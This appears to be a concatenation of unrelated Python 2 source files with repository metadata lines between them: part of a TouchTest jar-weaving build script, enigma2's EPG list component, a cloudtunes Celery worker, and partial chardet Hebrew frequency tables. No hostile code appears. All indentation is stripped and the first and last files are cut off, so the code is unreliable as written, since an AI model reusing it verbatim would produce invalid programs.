print "[DEBUG] TouchTest : Creating backup of file: {file}".format(file=jar_file)
shutil.copy(jar_file, jar_bak_file)
else:
print "[DEBUG] TouchTest : Backpup already present: {file}".format(file=jar_file)
shutil.copy(jar_file + ".bak", jar_file)
def restore(jar):
jar_file = template_dir + "/" + jar + ".jar"
print "[DEBUG] TouchTest : Restoring file: {file}".format(file=jar_file)
shutil.copy(jar_file + ".bak", jar_file)
os.remove(jar_file + ".bak")
def getBlackList():
blacklist_file = touchtest_dir + "/blacklist.txt"
blacklist_mod = []
# Check to see if the file exists. This shouldn't happen but if it does, we will act as if the
# file was of size 0.
if not os.path.exists(blacklist_file):
return None
elif os.path.getsize(blacklist_file) > 0:
# Get the information out of the black list and ignore the modules with the specified names.
with open(blacklist_file) as blackListFile:
for line in blackListFile:
# Skip the comments and empty lines
if not line.strip() or line.strip().startswith("#"):
continue
blacklist_mod.append(`line.strip()`)
# Joining the modules found into one long string to create the black list.
# This way of creating the list came from: http://www.skymind.com/~ocrow/python_string/
# which claimed that using the join was one of the fastest ways to concatenate
# strings with the flexibility needed to exclude modules that are commented out.
return ''.join(blacklist_mod)
else:
# There is nothing in the blacklist file so there's nothing to check.
return None
def instrument(classpath, jar):
if not os.path.exists(template_dir + "/touchtest/"):
os.makedirs(template_dir + "/touchtest/")
inpath = template_dir + "/" + jar + ".jar.bak"
print "[DEBUG] TouchTest : Process %s " % inpath
aspectpath = jar_dir + "TouchTestDriver.jar" + classpath_separator + jar_dir + "TouchTestDriver-Titanium.jar"
outjar = template_dir + "/" + jar + ".jar"
if os.path.exists(outjar):
os.remove(outjar)
weaveJar(classpath, inpath, aspectpath, outjar)
def instrumentExternalJars(classpath, jar):
inpath = jar + ".original"
shutil.copyfile(jar, inpath)
print "[DEBUG] TouchTest : Processing %s " % jar
aspectpath = jar_dir + "TouchTestDriver.jar" + classpath_separator + jar_dir + "TouchTestDriver-Titanium.jar"
outjar = jar
if os.path.exists(outjar):
os.remove(outjar)
try:
weaveJar(classpath, inpath, aspectpath, outjar)
except:
# Jar weaving failed, restore the jar file
print "[ERROR] TouchTest : Unexpected error:", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]
print "[ERROR] TouchTest : Exception occured. Restoring " + jar + " file."
shutil.copyfile(inpath, jar)
if os.path.exists(inpath):
os.remove(inpath)
def weaveJar(classpath, inpath, aspectpath, outjar):
param = "-Xlint:ignore -inpath \"" + inpath + "\" -aspectpath \"" + aspectpath + "\" -outjar \"" + outjar + "\" -cp \"" + classpath + "\""
# Weave aspects into jar files
ajc = [];
ajc.append("java")
ajc.append("-classpath")
ajc.append(classpath)
ajc.append("-Xmx256M")
ajc.append("org.aspectj.tools.ajc.Main")
ajc.append("-Xlint:ignore")
ajc.append("-inpath")
ajc.append(inpath)
ajc.append("-aspectpath")
ajc.append(aspectpath)
ajc.append("-outjar")
ajc.append(outjar)
print "[DEBUG] TouchTest : Using %s " % param
sys.stdout.flush()
subprocess.call(ajc)
print "[DEBUG] TouchTest : %s processed" % inpath
def mergeAll(jars, targetjar):
# Create the new temporary JAR
tmpjar = targetjar + ".tmp"
if os.path.exists(tmpjar):
os.remove(tmpjar)
with zipfile.ZipFile(tmpjar, mode='a') as zMerged:
for fname in jars:
zf = zipfile.ZipFile(fname, 'r')
for n in zf.namelist():
zMerged.writestr(n, zf.open(n).read())
if os.path.exists(targetjar):
# Remove the target JAR
os.remove(targetjar)
# Rename to tmp JAR to target JAR
shutil.move(tmpjar, targetjar)
def merge():
print "[DEBUG] TouchTest : Add TouchTest capabilities in %s" % template_dir + "/titanium.jar"
mergeAll([template_dir + "/titanium.jar",
jar_dir + "aspectjrt.jar",
jar_dir + "TouchTestDriver-APIv12.jar",
jar_dir + "TouchTestDriver-APIv11.jar",
jar_dir + "TouchTestDriver-Titanium.jar",
jar_dir + "TouchTestDriver.jar"],
template_dir + "/titanium.jar")
# Checks for the presence of TouchTest Android Module
def isAndroidModuleEnabled(modules, deploy_type):
for module in modules:
if module['platform'] == 'android' and module['id'] == 'com.soasta.touchtest':
# We need to validate that the deploy-type key actually is present in the module.
# Because deploy-type key is not present on Titanium SDK before 3.0
if 'deploy-type' in module.keys():
if module['deploy-type'] in ['', deploy_type]:
return True
else:
continue
else:
return True
return False
|
ACJTeam/enigma2
|
refs/heads/master
|
lib/python/Components/EpgList.py
|
1
|
from HTMLComponent import HTMLComponent
from GUIComponent import GUIComponent
from enigma import eEPGCache, eListbox, eListboxPythonMultiContent, gFont, RT_HALIGN_LEFT, RT_HALIGN_RIGHT, RT_HALIGN_CENTER, RT_VALIGN_CENTER
from Tools.Alternatives import CompareWithAlternatives
from Tools.LoadPixmap import LoadPixmap
from time import localtime, time
from Components.config import config
from ServiceReference import ServiceReference
from Tools.Directories import resolveFilename, SCOPE_CURRENT_SKIN
from skin import parseFont
EPG_TYPE_SINGLE = 0
EPG_TYPE_MULTI = 1
EPG_TYPE_SIMILAR = 2
class Rect:
def __init__(self, x, y, width, height):
self.x = x
self.y = y
self.w = width
self.h = height
# silly, but backward compatible
def left(self):
return self.x
def top(self):
return self.y
def height(self):
return self.h
def width(self):
return self.w
class EPGList(HTMLComponent, GUIComponent):
def __init__(self, type=EPG_TYPE_SINGLE, selChangedCB=None, timer = None):
self.days = (_("Mon"), _("Tue"), _("Wed"), _("Thu"), _("Fri"), _("Sat"), _("Sun"))
self.timer = timer
self.onSelChanged = [ ]
if selChangedCB is not None:
self.onSelChanged.append(selChangedCB)
GUIComponent.__init__(self)
self.type=type
self.l = eListboxPythonMultiContent()
self.eventItemFont = gFont("Regular", 22)
self.eventTimeFont = gFont("Regular", 16)
self.iconSize = 21
self.iconDistance = 2
self.colGap = 10
self.skinColumns = False
self.tw = 90
self.dy = 0
if type == EPG_TYPE_SINGLE:
self.l.setBuildFunc(self.buildSingleEntry)
elif type == EPG_TYPE_MULTI:
self.l.setBuildFunc(self.buildMultiEntry)
else:
assert(type == EPG_TYPE_SIMILAR)
self.l.setBuildFunc(self.buildSimilarEntry)
self.epgcache = eEPGCache.getInstance()
self.clocks = [ LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_post.png')) ]
def getEventFromId(self, service, eventid):
event = None
if self.epgcache is not None and eventid is not None:
event = self.epgcache.lookupEventId(service.ref, eventid)
return event
def getCurrentChangeCount(self):
if self.type == EPG_TYPE_MULTI and self.l.getCurrentSelection() is not None:
return self.l.getCurrentSelection()[0]
return 0
def getCurrent(self):
idx=0
if self.type == EPG_TYPE_MULTI:
idx += 1
tmp = self.l.getCurrentSelection()
if tmp is None:
return ( None, None )
eventid = tmp[idx+1]
service = ServiceReference(tmp[idx])
event = self.getEventFromId(service, eventid)
return ( event, service )
def moveUp(self):
self.instance.moveSelection(self.instance.moveUp)
def moveDown(self):
self.instance.moveSelection(self.instance.moveDown)
def connectSelectionChanged(func):
if not self.onSelChanged.count(func):
self.onSelChanged.append(func)
def disconnectSelectionChanged(func):
self.onSelChanged.remove(func)
def selectionChanged(self):
for x in self.onSelChanged:
if x is not None:
x()
# try:
# x()
# except: # FIXME!!!
# print "FIXME in EPGList.selectionChanged"
# pass
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
instance.setWrapAround(True)
instance.selectionChanged.get().append(self.selectionChanged)
instance.setContent(self.l)
def preWidgetRemove(self, instance):
instance.selectionChanged.get().remove(self.selectionChanged)
instance.setContent(None)
def recalcEntrySize(self):
esize = self.l.getItemSize()
width = esize.width()
height = esize.height()
try:
self.iconSize = self.clocks[0].size().height()
except:
pass
self.space = self.iconSize + self.iconDistance
self.dy = int((height - self.iconSize)/2.)
if self.type == EPG_TYPE_SINGLE:
if self.skinColumns:
x = 0
self.weekday_rect = Rect(0, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.datetime_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.descr_rect = Rect(x, 0, width-x, height)
else:
self.weekday_rect = Rect(0, 0, width/20*2-10, height)
self.datetime_rect = Rect(width/20*2, 0, width/20*5-15, height)
self.descr_rect = Rect(width/20*7, 0, width/20*13, height)
elif self.type == EPG_TYPE_MULTI:
if self.skinColumns:
x = 0
self.service_rect = Rect(x, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.progress_rect = Rect(x, 8, self.gap(self.col[1]), height-16)
self.start_end_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.descr_rect = Rect(x, 0, width-x, height)
else:
xpos = 0
w = width/10*3
self.service_rect = Rect(xpos, 0, w-10, height)
xpos += w
w = width/10*2
self.start_end_rect = Rect(xpos, 0, w-10, height)
self.progress_rect = Rect(xpos, 4, w-10, height-8)
xpos += w
w = width/10*5
self.descr_rect = Rect(xpos, 0, width, height)
else: # EPG_TYPE_SIMILAR
if self.skinColumns:
x = 0
self.weekday_rect = Rect(0, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.datetime_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.service_rect = Rect(x, 0, width-x, height)
else:
self.weekday_rect = Rect(0, 0, width/20*2-10, height)
self.datetime_rect = Rect(width/20*2, 0, width/20*5-15, height)
self.service_rect = Rect(width/20*7, 0, width/20*13, height)
def gap(self, width):
return width - self.colGap
def getClockTypesForEntry(self, service, eventId, beginTime, duration):
if not beginTime:
return None
rec = self.timer.isInTimer(eventId, beginTime, duration, service)
if rec is not None:
return rec[1]
else:
return None
def buildSingleEntry(self, service, eventId, beginTime, duration, EventName):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.weekday_rect
r2=self.datetime_rect
r3=self.descr_rect
t = localtime(beginTime)
res = [
None, # no private data needed
(eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, self.days[t[6]]),
(eListboxPythonMultiContent.TYPE_TEXT, r2.x, r2.y, r2.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, "%2d.%02d, %02d:%02d"%(t[2],t[1],t[3],t[4]))
]
if clock_types:
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r3.x + i * self.space, r3.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[i]]))
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x + (i + 1) * self.space, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, EventName))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, EventName))
return res
def buildSimilarEntry(self, service, eventId, beginTime, service_name, duration):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.weekday_rect
r2=self.datetime_rect
r3=self.service_rect
t = localtime(beginTime)
res = [
None, # no private data needed
(eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, self.days[t[6]]),
(eListboxPythonMultiContent.TYPE_TEXT, r2.x, r2.y, r2.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, "%2d.%02d, %02d:%02d"%(t[2],t[1],t[3],t[4]))
]
if clock_types:
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r3.x + i * self.space, r3.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[i]]))
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x + (i + 1) * self.space, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
return res
def buildMultiEntry(self, changecount, service, eventId, beginTime, duration, EventName, nowTime, service_name):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.service_rect
r2=self.progress_rect
r3=self.descr_rect
r4=self.start_end_rect
res = [ None ] # no private data needed
if clock_types:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w - self.space * len(clock_types), r1.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r1.x + r1.w - self.space * (i + 1), r1.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[len(clock_types) - 1 - i]]))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
if beginTime is not None:
if nowTime < beginTime:
begin = localtime(beginTime)
end = localtime(beginTime+duration)
res.extend((
(eListboxPythonMultiContent.TYPE_TEXT, r4.x, r4.y, r4.w, r4.h, 1, RT_HALIGN_CENTER|RT_VALIGN_CENTER, "%02d.%02d - %02d.%02d"%(begin[3],begin[4],end[3],end[4])),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, self.gap(self.tw), r3.h, 1, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, _("%d min") % (duration / 60)),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x + self.tw, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT, EventName)
))
else:
percent = (nowTime - beginTime) * 100 / duration
prefix = "+"
remaining = ((beginTime+duration) - int(time())) / 60
if remaining <= 0:
prefix = ""
res.extend((
(eListboxPythonMultiContent.TYPE_PROGRESS, r2.x, r2.y, r2.w, r2.h, percent),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, self.gap(self.tw), r3.h, 1, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, _("%s%d min") % (prefix, remaining)),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x + self.tw, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT, EventName)
))
return res
def queryEPG(self, list, buildFunc=None):
if self.epgcache is not None:
if buildFunc is not None:
return self.epgcache.lookupEvent(list, buildFunc)
else:
return self.epgcache.lookupEvent(list)
return [ ]
def fillMultiEPG(self, services, stime=-1):
#t = time()
test = [ (service.ref.toString(), 0, stime) for service in services ]
test.insert(0, 'X0RIBDTCn')
self.list = self.queryEPG(test)
self.l.setList(self.list)
#print time() - t
self.selectionChanged()
def updateMultiEPG(self, direction):
#t = time()
test = [ x[3] and (x[1], direction, x[3]) or (x[1], direction, 0) for x in self.list ]
test.insert(0, 'XRIBDTCn')
tmp = self.queryEPG(test)
cnt=0
for x in tmp:
changecount = self.list[cnt][0] + direction
if changecount >= 0:
if x[2] is not None:
self.list[cnt]=(changecount, x[0], x[1], x[2], x[3], x[4], x[5], x[6])
cnt+=1
self.l.setList(self.list)
#print time() - t
self.selectionChanged()
def fillSingleEPG(self, service):
t = time()
epg_time = t - config.epg.histminutes.getValue()*60
test = [ 'RIBDT', (service.ref.toString(), 0, epg_time, -1) ]
self.list = self.queryEPG(test)
self.l.setList(self.list)
if t != epg_time:
idx = 0
for x in self.list:
idx += 1
if t < x[2]+x[3]:
break
self.instance.moveSelectionTo(idx-1)
self.selectionChanged()
def sortSingleEPG(self, type):
list = self.list
if list:
event_id = self.getSelectedEventId()
if type == 1:
list.sort(key=lambda x: (x[4] and x[4].lower(), x[2]))
else:
assert(type == 0)
list.sort(key=lambda x: x[2])
self.l.invalidate()
self.moveToEventId(event_id)
def getSelectedEventId(self):
x = self.l.getCurrentSelection()
return x and x[1]
def moveToService(self,serviceref):
if not serviceref:
return
index = 0
refstr = serviceref.toString()
for x in self.list:
if CompareWithAlternatives(x[1], refstr):
self.instance.moveSelectionTo(index)
break
index += 1
def moveToEventId(self, eventId):
if not eventId:
return
index = 0
for x in self.list:
if x[1] == eventId:
self.instance.moveSelectionTo(index)
break
index += 1
def fillSimilarList(self, refstr, event_id):
t = time()
# search similar broadcastings
if event_id is None:
return
l = self.epgcache.search(('RIBND', 1024, eEPGCache.SIMILAR_BROADCASTINGS_SEARCH, refstr, event_id))
if l and len(l):
l.sort(key=lambda x: x[2])
self.l.setList(l)
self.selectionChanged()
print time() - t
def applySkin(self, desktop, parent):
def warningWrongSkinParameter(string):
print "[EPGList] wrong '%s' skin parameters" % string
def setEventItemFont(value):
self.eventItemFont = parseFont(value, ((1,1),(1,1)))
def setEventTimeFont(value):
self.eventTimeFont = parseFont(value, ((1,1),(1,1)))
def setIconDistance(value):
self.iconDistance = int(value)
def setIconShift(value):
self.dy = int(value)
def setTimeWidth(value):
self.tw = int(value)
def setColWidths(value):
self.col = map(int, value.split(','))
if len(self.col) == 2:
self.skinColumns = True
else:
warningWrongSkinParameter(attrib)
def setColGap(value):
self.colGap = int(value)
for (attrib, value) in self.skinAttributes[:]:
try:
locals().get(attrib)(value)
self.skinAttributes.remove((attrib, value))
except:
pass
self.l.setFont(0, self.eventItemFont)
self.l.setFont(1, self.eventTimeFont)
return GUIComponent.applySkin(self, desktop, parent)
|
devmax59/cloudtunes
|
refs/heads/master
|
cloudtunes-server/cloudtunes/worker.py
|
14
|
"""
Main script for Celery worker.
"""
from __future__ import absolute_import
from celery.app import Celery
from cloudtunes import settings
celery = Celery(
'tasks',
broker='redis://{host}:6379/1'.format(**settings.REDIS)
)
celery.conf.CELERY_DISABLE_RATE_LIMITS = True
celery.conf.CELERY_IMPORTS = [
'cloudtunes.services.dropbox.sync',
'cloudtunes.services.youtube.sync',
'cloudtunes.services.facebook.sync',
'cloudtunes.mail',
]
def main():
celery.start()
if __name__ == '__main__':
main()
|
shuishoudage/CloudappCLI
|
refs/heads/master
|
env/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langhebrewmodel.py
|
2762
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Simon Montagu
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Shoshannah Forbes - original C code (?)
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Windows-1255 language model
# Character Mapping Table:
win1255_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 69, 91, 79, 80, 92, 89, 97, 90, 68,111,112, 82, 73, 95, 85, # 40
78,121, 86, 71, 67,102,107, 84,114,103,115,253,253,253,253,253, # 50
253, 50, 74, 60, 61, 42, 76, 70, 64, 53,105, 93, 56, 65, 54, 49, # 60
66,110, 51, 43, 44, 63, 81, 77, 98, 75,108,253,253,253,253,253, # 70
124,202,203,204,205, 40, 58,206,207,208,209,210,211,212,213,214,
215, 83, 52, 47, 46, 72, 32, 94,216,113,217,109,218,219,220,221,
34,116,222,118,100,223,224,117,119,104,125,225,226, 87, 99,227,
106,122,123,228, 55,229,230,101,231,232,120,233, 48, 39, 57,234,
30, 59, 41, 88, 33, 37, 36, 31, 29, 35,235, 62, 28,236,126,237,
238, 38, 45,239,240,241,242,243,127,244,245,246,247,248,249,250,
9, 8, 20, 16, 3, 2, 24, 14, 22, 1, 25, 15, 4, 11, 6, 23,
12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.4004%
# first 1024 sequences: 1.5981%
# rest sequences: 0.087%
# negative sequences: 0.0015%
HebrewLangModel = (
0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0,
3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,
1,2,1,2,1,2,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,
1,2,1,3,1,1,0,0,2,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,1,2,2,1,3,
1,2,1,1,2,2,0,0,2,2,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,2,2,2,3,2,
1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,3,2,2,3,2,2,2,1,2,2,2,2,
1,2,1,1,2,2,0,1,2,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,0,2,2,2,2,2,
0,2,0,2,2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,0,2,2,2,
0,2,1,2,2,2,0,0,2,1,0,0,0,0,1,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,2,1,2,3,2,2,2,
1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,2,0,2,
0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,2,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,2,2,3,2,1,2,1,1,1,
0,1,1,1,1,1,3,0,1,0,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0,
0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,2,1,2,3,3,2,3,3,3,3,2,3,2,1,2,0,2,1,2,
0,2,0,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,1,2,2,3,3,2,3,2,3,2,2,3,1,2,2,0,2,2,2,
0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,2,2,3,3,3,3,1,3,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,2,3,2,2,2,1,2,2,0,2,2,2,2,
0,2,0,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,1,3,2,3,3,2,3,3,2,2,1,2,2,2,2,2,2,
0,2,1,2,1,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,2,3,2,3,3,2,3,3,3,3,2,3,2,3,3,3,3,3,2,2,2,2,2,2,2,1,
0,2,0,1,2,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,1,2,3,3,3,3,3,3,3,2,3,2,3,2,1,2,3,0,2,1,2,2,
0,2,1,1,2,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,2,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,3,2,1,3,1,2,2,2,1,2,3,3,1,2,1,2,2,2,2,
0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,0,2,3,3,3,1,3,3,3,1,2,2,2,2,1,1,2,2,2,2,2,2,
0,2,0,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
